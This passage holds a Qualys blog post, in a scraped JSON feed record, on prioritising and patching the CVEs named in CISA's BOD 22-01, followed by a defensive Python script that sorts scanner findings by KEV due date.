Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys 
VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate vulnerable hosts through Qualys Threat Protection by simply clicking on the impacted hosts, to effectively identify and track these vulnerabilities.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the [\"CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most \"Category 2\" vulnerabilities by **November 17, 2021**, and \"Category 3\" vulnerabilities by **May 3, 2022**. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to meet the directive's aggressive remediation date of November 17, 2021. 
Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not 
currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for the \u201cCategory 1\u201d past-due CVEs, copy the following query into the Patch Management app:\n\ncve:[`CVE-2021-1732`,`CVE-2020-1350`,`CVE-2020-1472`,`CVE-2021-26855`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2020-0601`,`CVE-2021-26857`,`CVE-2021-22893`,`CVE-2020-8243`,`CVE-2021-22900`,`CVE-2021-22894`,`CVE-2020-8260`,`CVE-2021-22899`,`CVE-2019-11510`]\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help; the Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configuration changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but only partial step in threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. 
Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", 
"CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
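Both Qualys posts above reduce to the same workflow: take a scanner's per-asset CVE findings, check each CVE against the CISA KEV catalog and against the advisory's top-20 list, and sort by KEV due date into the BOD 22-01 buckets (past due, within two weeks, later). The following Python is an added example, not Qualys's or the page's own code; it performs that cross-reference offline. The KEV excerpt uses the field names of the real feed (`cveID`, `vendorProject`, `product`, `dateAdded`, `dueDate`), but its entries and due dates are constructed for illustration rather than copied from CISA, and the scan findings and hostnames are likewise constructed. CVE-2021-1468, the vManage RCE from the top of this page, is included as a finding that is absent from the excerpt to show how uncatalogued CVEs are handled: with the full feed loaded, that category means genuinely absent from KEV.

```python
from datetime import date, timedelta

# The 20 CVEs from the NSA/CISA/FBI advisory table reproduced on this page.
ADVISORY_TOP20 = frozenset([
    'CVE-2021-44228', 'CVE-2019-11510', 'CVE-2021-22205', 'CVE-2022-26134',
    'CVE-2021-26855', 'CVE-2020-5902', 'CVE-2021-22005', 'CVE-2019-19781',
    'CVE-2021-1497', 'CVE-2021-20090', 'CVE-2021-26084', 'CVE-2021-36260',
    'CVE-2021-42237', 'CVE-2022-1388', 'CVE-2022-24112', 'CVE-2021-40539',
    'CVE-2021-26857', 'CVE-2021-26858', 'CVE-2021-27065', 'CVE-2021-41773',
])

# Constructed excerpt in the shape of the KEV JSON feed. Field names match the
# feed; the entries and dueDate values are illustrative, not copied from CISA.
# For real use, json.load() the downloaded feed and pass it in unchanged.
KEV_SAMPLE = {
    'vulnerabilities': [
        {'cveID': 'CVE-2021-26855', 'vendorProject': 'Microsoft', 'product': 'Exchange Server',
         'dateAdded': '2021-11-03', 'dueDate': '2021-04-16'},
        {'cveID': 'CVE-2021-44228', 'vendorProject': 'Apache', 'product': 'Log4j2',
         'dateAdded': '2021-12-10', 'dueDate': '2021-12-24'},
        {'cveID': 'CVE-2021-1497', 'vendorProject': 'Cisco', 'product': 'HyperFlex HX',
         'dateAdded': '2021-11-03', 'dueDate': '2022-05-03'},
        {'cveID': 'CVE-2020-0601', 'vendorProject': 'Microsoft', 'product': 'Windows',
         'dateAdded': '2021-11-03', 'dueDate': '2022-05-03'},
        {'cveID': 'CVE-2022-1388', 'vendorProject': 'F5', 'product': 'BIG-IP',
         'dateAdded': '2022-05-10', 'dueDate': '2022-05-31'},
        {'cveID': 'CVE-2020-5902', 'vendorProject': 'F5', 'product': 'BIG-IP',
         'dateAdded': '2021-11-03', 'dueDate': '2022-07-01'},
    ]
}

# Constructed scanner output: asset -> CVEs detected on it (hostnames invented).
SCAN_FINDINGS = {
    'exch01.corp.example': ['CVE-2021-26855'],
    'hx-installer.corp.example': ['CVE-2021-1497'],
    'lb-edge.corp.example': ['CVE-2022-1388', 'CVE-2020-5902'],
    'app07.corp.example': ['CVE-2021-44228'],
    'dc02.corp.example': ['CVE-2020-0601'],
    'vmanage01.corp.example': ['CVE-2021-1468'],
}


def categorize(due, today):
    """Map a KEV due date to the BOD 22-01 bucket used in the post above."""
    if due is None:
        return 'Not in KEV'
    if due < today:
        return 'Category 1: past due'
    if due <= today + timedelta(days=14):
        return 'Category 2: due within two weeks'
    return 'Category 3: due later'


def prioritize(findings, kev, advisory, today):
    """Cross-reference scanner findings with the KEV catalog and the advisory list.

    Returns one row per (asset, CVE), ordered so that past-due KEV entries come
    first, then the nearest due dates, with advisory-listed CVEs breaking ties.
    CVEs absent from KEV sort last but are still returned: they must be patched
    too, just on the organization's own risk schedule rather than CISA's.
    """
    by_cve = {v['cveID']: v for v in kev['vulnerabilities']}
    rows = []
    for asset, cves in findings.items():
        for cve in cves:
            entry = by_cve.get(cve)
            due = date.fromisoformat(entry['dueDate']) if entry else None
            rows.append({
                'asset': asset,
                'cve': cve,
                'in_kev': entry is not None,
                'in_advisory': cve in advisory,
                'product': entry['product'] if entry else None,
                'due': due,
                'category': categorize(due, today),
            })
    rows.sort(key=lambda r: (r['due'] is None, r['due'] or date.max,
                             not r['in_advisory'], r['cve']))
    return rows


def summarize(rows):
    """Count rows per category, the figure the BOD 22-01 post reports."""
    counts = {}
    for r in rows:
        counts[r['category']] = counts.get(r['category'], 0) + 1
    return counts


if __name__ == '__main__':
    # Fixed reference date so the output is reproducible; use date.today() live.
    ranked = prioritize(SCAN_FINDINGS, KEV_SAMPLE, ADVISORY_TOP20, date(2022, 5, 20))
    for r in ranked:
        print(r['category'], r['asset'], r['cve'], r['due'], 'advisory' if r['in_advisory'] else '')
    print(summarize(ranked))
```

The order is the point: an asset's CVSS score does not move it in this list, the catalog due date does, and advisory membership only breaks ties. Swap `KEV_SAMPLE` for the parsed live feed and `SCAN_FINDINGS` for an export of your scanner's CVE-per-asset view and the same two functions produce the Category 1/2/3 breakdown for your own estate.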